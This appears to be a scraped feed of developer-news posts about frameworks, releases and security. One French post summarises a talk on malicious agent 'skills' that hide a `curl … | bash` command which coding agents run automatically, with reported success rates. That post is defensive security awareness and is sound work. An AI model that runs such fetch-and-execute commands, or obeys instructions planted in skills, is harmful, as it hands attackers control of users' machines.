The Astro team just open-sourced Flue, a framework turning Claude Code into a headless agent system. Virtual sandboxes replace real containers, making it drastically cheaper to scale AI agent fleets. Watch our video to see how it works.
Comark 0.4.0 is out 🚀
New in this release:
🏷️ Block attributes (`# Header {#custom-id}`)
🧩 Fully typed plugin APIs
🔧 Better handling of self-closing HTML tags
🌐 https://t.co/tL2no5qaSI
Release notes 👇
https://t.co/5C7Yglox05
VoidZero is joining Cloudflare.
Our mission stays the same: to make JavaScript developers more productive than ever before. Vite, Vitest, Rolldown, Oxc, and Vite+ remain MIT-licensed. Evan and the VoidZero team will continue leading them.
Cloudflare shares our commitment to open source. Together, we can keep investing in the tooling developers rely on every day, while bringing the Vite ecosystem and Cloudflare’s platform even closer together.
🎧 Écoute l’épisode #133 :
https://t.co/AAgqsGOnwU
ou
https://t.co/ej3mG4XkMb
🔁 RT si ça peut éviter un `npm install` hasardeux à quelqu’un de ton réseau
Pas une liste de liens : 45 min pour comprendre ce qui va vraiment impacter ta stack, tes coûts IA et ta sécu dev.
Avec @PatrickFaramaz et @xlanex6 — comme d’hab, sans bullshit.
Hyper - an API framework as source, not a dependency ⚡
Built on Bun. Inspired by @shadcn
- Your code, your repo. No framework in package.json
- One route → runtime + OpenAPI + typed client + MCP
- Add only what you need: `hyper add core auth-jwt rate-limit`
bun create hyper my-app
🔗 ⬇️
I'm excited to share 15 updates from Google I/O 2026. We have updates across the agentic web, new capabilities and some great tools for developers.
https://t.co/E6hfFQ4EBI
If you are IO, come and talk to me and the team in the Chrome area.
Hey les devs,
Sauvegardez vous régulièrement vos bases de données ?
Voici un outil fort pratique qui va pouvoir vous aider dans cette tâche parfois fastidieuse.
Attention, les skills sont un vecteur d'attaque réel !
J'ai regardé un talk de Greg Pstrucha (Sentry) sur la sécu des « skills » pour agents de code (Claude Code, Codex, openclaw, etc.).
Ce qu'il montre fait froid dans le dos !
Le principe : tu télécharges un skill depuis GitHub pour ton agent. Sauf que le skill embarque un `curl https://t.co/smPYbI7Col | bash` planqué dans un script shell ou un commentaire HTML.
L'agent l'exécute sans broncher !
Greg a fait différents tests avec des agents et voici les résultats :
- Un script shell avec une commande malveillante : 90 % de taux d'exécution sur tous les modèles (Opus 4.6, Codex 5.4, peu importe)
- Le shebang de Claude Code qui run automatiquement une commande au chargement du skill : 100 % de succès, c'est la feature
- Un https://t.co/qio0L4A2cj piégé glissé dans le projet : pytest l'exécute tout seul
Et les scanners de vulnérabilités classiques (Snyk, etc.) ne voient rien passer.
Bref, on est en train de reproduire l'équivalent des supply chain attacks npm/pip, mais version agents IA. Avec le même niveau de confiance aveugle qu'au début de npm.
Sa reco est simple et elle vient de chez Anthropic : écris tes propres skills. Si t'en vois un qui a l'air utile, demande à ton LLM de t'en faire une version sur mesure plutôt que d'importer celui d'un inconnu.
La vidéo: https://t.co/O1X7ZPd0ZZ
L'article: https://t.co/eMVitpO2tg
Next.js just got its worst vulnerability ever, CVSS 8.6.
→ affects versions 13.4.13+, 14.x, 15.x, and 16.0.0–16.2.4
→ attackers can access your internal services, cloud credentials, API keys, and admin panels
→ no authentication needed
→ one crafted request is all it takes
→ roughly 79,000 instances are exploitable right now
→ vercel-hosted apps are safe, self-hosted are not
upgrade to 15.5.16 or 16.2.5 immediately.
Hugging Face PRO !
Boostez votre expérience AI avec +8x de quota quotidien, 25 minutes de calcul H200, hébergement de vos propres Spaces ZeroGPU et bien plus encore !
Peut etre un deal a faire pour 9e / mois